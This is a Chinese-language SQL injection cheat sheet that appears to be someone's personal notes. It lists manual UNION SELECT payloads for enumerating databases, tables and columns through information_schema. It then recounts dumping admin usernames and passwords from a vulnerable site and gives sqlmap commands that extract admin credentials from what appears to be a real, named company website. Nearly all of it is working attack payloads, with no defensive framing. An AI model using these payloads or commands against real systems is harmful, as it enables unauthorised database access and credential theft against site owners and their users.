sql注入总结

常见的手工注入方法

• 判断注入点:' and 1=1' 'and 1=2'报错来判断是否是注入点,部分诸如点事宽字节注入%df'来判断
• 利用order by 猜测出列数
• 获取数据库的名称和版本号   http://www.xxx.asp?id=1' union select 1,2,3,4....n--+
• 利用'--+'或者是'#'把后面的代码注释掉，防止报错，有的时候网页不回显，可以尝试传入一个无效的参数值
• 在爆出数据的地方替换成database(),@@version,version(), eg:'union select 1,2,version(),@@version(),database()--+
• 如果mysql的版本号大于5，那就存在information_schema表，可以尝试以下注入
• 查询数据库名  union select 1,2,3,group_concat(schema_name),5 from information_schema.schemata #
• 查询表名 union selet 1,2,3,group_concat(table_name), 5 from information_schema.tables where table_schema='数据库'#  
  或者是： union select 1,2,3,group_concat(table_name),5,from information_schema.tables where table_schema=数据库名的16进制#  
  数据库名的16进制没有引号
• 查询列名 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name='表名'#
• 最后爆数据 union select 1,2,3,group_concat(列名),5 from 表名#
  搞定手动

开坑（盲注）

未完待续

手工注入

发现了一个网站存在sql注入漏洞
于是先猜测表名 and exists (select * from admin),页面显示正常，说明存在admin表，于是order by n 猜测列数
猜测出列数是28，页面显示23，然后联合查询,把23分别替换成username,password之后，获得账号密码

and exists (select * from admin)

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,username,24,25,26,27,28 from admin

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25,26,27,28 from admin

sqlmap工具注入

sqlmap -u http:***?article=91
结果显示article是一个注入点，显示出是布尔类型，payload
sqlmap -u http:***?article=91 --tables
猜测表名，发现表名中有一个admin,
sqlmap -u http:***?article=91 --columns -T admin
查询这张表的列名
sqlmap -u http://www.inbond-cn.com/showproducts.asp?id=91 --columns -T admin
回显数据
sqlmap -u http://www.inbond-cn.com/showproducts.asp?id=91 --dump -C "username,password" -T admin